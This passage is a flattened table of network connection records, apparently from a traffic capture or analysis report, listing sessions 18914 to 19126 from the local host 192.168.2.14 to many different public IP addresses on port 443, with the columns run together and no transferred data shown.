                                                        18914192.168.2.1451190151.184.183.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18915192.168.2.1456328135.36.106.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18916192.168.2.14521305.192.8.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18917192.168.2.1437242208.129.80.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18918192.168.2.1443658170.255.235.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18919192.168.2.144710831.42.70.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18920192.168.2.1434904163.45.90.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18921192.168.2.145440898.47.68.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18922192.168.2.1443538206.12.226.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18923192.168.2.1454592178.90.34.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18924192.168.2.1441124120.9.194.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18925192.168.2.1440208100.247.3.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18926192.168.2.1445498121.115.238.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18927192.168.2.1447336151.72.128.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18928192.168.2.1437252223.38.177.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18929192.168.2.1459332106.246.67.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18930192.168.2.1442878155.246.132.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18931192.168.2.1452568151.227.124.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18932192.168.2.1447802161.19.129.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18933192.168.2.143526690.255.218.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18934192.168.2.145792684.152.34.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18935192.168.2.1446140210.70.37.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18936192.168.2.1439700129.21.96.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18937192.168.2.1459612111.228.44.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18938192.168.2.1452964152.131.75.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18939192.168.2.1450064154.86.237.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18940192.168.2.1448698210.17.202.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18941192.168.2.1435988181.136.118.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18942192.168.2.1439278177.5.217.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18943192.168.2.145752469.46.198.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18944192.168.2.1448838159.239.227.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18945192.168.2.1442310115.251.113.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18946192.168.2.1453338109.148.167.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18947192.168.2.1457150172.65.106.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18948192.168.2.1447852100.239.229.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18949192.168.2.145279061.11.193.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18950192.168.2.144774225.54.3.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18951192.168.2.144047625.199.53.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18952192.168.2.1437654170.150.246.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18953192.168.2.1440350159.152.238.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18954192.168.2.1441364166.1.10.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18955192.168.2.144573097.232.6.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18956192.168.2.145642681.29.65.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18957192.168.2.1453998148.167.200.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18958192.168.2.145816619.234.53.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18959192.168.2.1433990164.7.41.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18960192.168.2.14587408.34.58.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18961192.168.2.1432876133.176.37.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18962192.168.2.1446210133.131.120.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18963192.168.2.145017843.237.38.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18964192.168.2.144928244.155.112.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18965192.168.2.1439436146.199.40.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18966192.168.2.1434700216.195.44.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18967192.168.2.1451744199.56.111.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18968192.168.2.1451498135.22.50.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18969192.168.2.145864858.155.220.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18970192.168.2.144977617.1.251.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18971192.168.2.1457386109.170.4.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18972192.168.2.144599237.247.161.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18973192.168.2.144623427.191.5.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18974192.168.2.143330677.3.26.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18975192.168.2.1435794156.60.168.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18976192.168.2.1448542101.58.80.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18977192.168.2.144924648.252.38.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18978192.168.2.1442100143.140.233.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18979192.168.2.1448792100.151.222.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18980192.168.2.1454126147.147.85.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18981192.168.2.143447870.236.65.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18982192.168.2.1454184134.190.48.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18983192.168.2.14486845.37.36.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18984192.168.2.1450692195.255.204.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18985192.168.2.144314661.55.239.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18986192.168.2.1436052144.142.90.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18987192.168.2.1446804199.246.128.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18988192.168.2.1434586107.255.133.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18989192.168.2.1440288192.35.67.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18990192.168.2.14401288.168.119.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18991192.168.2.1459060110.251.108.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18992192.168.2.1453922141.206.127.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18993192.168.2.1447434172.62.56.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18994192.168.2.1457312141.103.76.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18995192.168.2.1455506115.118.93.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18996192.168.2.1450222128.224.102.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18997192.168.2.1439170114.22.0.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18998192.168.2.146085841.159.166.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18999192.168.2.1433842110.195.69.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19000192.168.2.1445840137.19.236.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19001192.168.2.1455194108.85.159.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19002192.168.2.1446760219.10.184.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19003192.168.2.1439724138.6.172.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19004192.168.2.144452252.109.58.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19005192.168.2.1433466140.129.48.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19006192.168.2.14549389.167.230.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19007192.168.2.145585062.216.104.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19008192.168.2.1460286210.131.112.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19009192.168.2.1445054134.24.121.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19010192.168.2.143645088.204.74.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19011192.168.2.1441204101.155.162.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19012192.168.2.1447366182.103.24.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19013192.168.2.145737071.151.94.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19014192.168.2.143697667.224.163.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19015192.168.2.1437340167.91.82.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19016192.168.2.145364446.36.108.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19017192.168.2.143495496.217.43.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19018192.168.2.143862265.232.109.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19019192.168.2.1452894197.89.22.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19020192.168.2.1436602159.94.233.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19021192.168.2.1438614144.91.158.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19022192.168.2.1443930210.202.245.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19023192.168.2.145289042.15.203.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19024192.168.2.1459234208.49.175.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19025192.168.2.145847024.28.34.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19026192.168.2.145631896.50.38.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19027192.168.2.1458670205.123.222.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19028192.168.2.143367280.197.156.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19029192.168.2.1434630125.74.115.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19030192.168.2.1453320203.10.177.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19031192.168.2.1458622151.130.5.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19032192.168.2.145000889.113.182.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19033192.168.2.1438348121.24.37.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19034192.168.2.144023694.9.81.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19035192.168.2.1448754101.189.119.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19036192.168.2.143395868.79.125.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19037192.168.2.145537294.75.108.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19038192.168.2.143689490.11.178.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19039192.168.2.1448886103.0.180.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19040192.168.2.1453244144.44.21.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19041192.168.2.1449714163.197.167.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19042192.168.2.144966099.228.111.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19043192.168.2.1449330219.43.236.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19044192.168.2.144293213.219.72.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19045192.168.2.1442722101.4.9.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19046192.168.2.1433030222.231.160.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19047192.168.2.143526858.116.29.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19048192.168.2.145240672.184.16.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19049192.168.2.1437386126.32.169.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19050192.168.2.1456718178.219.189.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19051192.168.2.1453824104.160.174.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19052192.168.2.143601263.27.165.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19053192.168.2.145271817.149.67.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19054192.168.2.1437838104.218.98.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19055192.168.2.145414289.202.121.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19056192.168.2.145727692.169.232.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19057192.168.2.143616291.191.249.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19058192.168.2.143644449.123.80.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19059192.168.2.1447384164.83.172.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19060192.168.2.144613284.195.241.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19061192.168.2.1460632174.52.69.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19062192.168.2.144618283.0.186.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19063192.168.2.1454762177.204.76.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19064192.168.2.1453896195.167.201.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19065192.168.2.1447676157.18.35.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19066192.168.2.1448752146.57.249.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19067192.168.2.1433974139.72.238.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19068192.168.2.145811645.76.143.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19069192.168.2.1437332201.240.255.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19070192.168.2.143523817.235.83.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19071192.168.2.1434410149.168.115.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19072192.168.2.1453902217.173.65.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19073192.168.2.14415524.236.24.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19074192.168.2.1451984103.186.255.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19075192.168.2.1435844173.212.82.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19076192.168.2.1454634188.89.97.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19077192.168.2.144994681.136.239.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19078192.168.2.1459528123.237.132.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19079192.168.2.14454021.3.142.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19080192.168.2.1436296193.30.237.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19081192.168.2.1443058179.89.216.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19082192.168.2.144866697.190.68.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19083192.168.2.1442544187.36.57.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19084192.168.2.146086884.165.108.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19085192.168.2.1452786151.105.215.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19086192.168.2.1442542131.16.10.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19087192.168.2.1460468181.90.240.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19088192.168.2.144969288.41.26.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19089192.168.2.1444166139.28.212.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19090192.168.2.1452388186.104.236.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19091192.168.2.1433002154.199.50.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19092192.168.2.1439364171.211.226.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19093192.168.2.144805857.124.109.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19094192.168.2.143511859.12.43.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19095192.168.2.143982073.207.247.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19096192.168.2.1444228133.9.48.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19097192.168.2.143380475.235.164.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19098192.168.2.1441960126.29.111.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19099192.168.2.1448412135.214.222.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19100192.168.2.1460462121.203.247.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19101192.168.2.1443928218.2.120.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19102192.168.2.1443708217.62.58.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19103192.168.2.1452780139.255.252.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19104192.168.2.1444468158.210.80.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19105192.168.2.1449528135.226.26.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19106192.168.2.1435232104.213.221.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19107192.168.2.1444448146.163.122.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19108192.168.2.145142494.231.224.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19109192.168.2.143648884.224.189.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19110192.168.2.1434324136.194.15.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19111192.168.2.145864220.123.123.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19112192.168.2.144835470.64.112.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19113192.168.2.145725837.145.79.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19114192.168.2.1451482140.24.166.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19115192.168.2.144931227.10.28.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19116192.168.2.1449620201.146.77.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19117192.168.2.1441512109.90.214.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19118192.168.2.145806623.66.177.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19119192.168.2.1455616119.235.254.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19120192.168.2.1444432169.246.73.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19121192.168.2.1447356203.207.173.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19122192.168.2.1443998196.203.14.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19123192.168.2.1450620183.255.191.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19124192.168.2.1446820136.231.251.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19125192.168.2.144463847.128.157.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19126192.168.2.143871278.43.33.111443
